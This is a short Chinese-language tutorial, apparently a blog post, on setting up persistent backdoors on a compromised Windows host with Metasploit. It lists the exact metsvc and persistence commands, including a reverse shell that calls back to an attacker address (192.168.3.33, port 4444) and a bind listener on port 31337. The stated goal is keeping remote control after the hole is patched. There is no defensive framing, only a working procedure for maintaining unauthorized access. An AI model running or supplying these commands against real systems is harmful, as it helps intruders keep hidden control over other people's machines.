metasploit永久后门简介
- 利用漏洞获取的meterpreter shell 运行于内存中,重启失效。
- 重复利用exploit 漏洞可能造成程序崩溃
- 持续永久后门保证漏洞修复后仍可以远程控制
metsvc永久后门
1.生成metsvc后门
run metsvc -A
2.启用侦听模块,设置指定metsvc_bind_tcp payload(metsvc默认侦听端口31337)
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
3.设置目标端口
set lport 31337
4.设置目标ip地址
set rhost 192.168.3.44
5.运行侦听模块
run
persistence永久后门
1.查看帮助信息
run persistence -h
2.生成永久后门,设置反弹ip及端口。
run persistence -X -i 10 -p 4444 -r 192.168.3.33
3.使用侦听模块,使用reverse_tcp payload。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
4.设置回连ip地址。
set lhost 192.168.3.33
5.运行侦听模块。
run
到此就完成了metasploit永久后门的介绍,如果想了解更多的Kali工具,请关注我!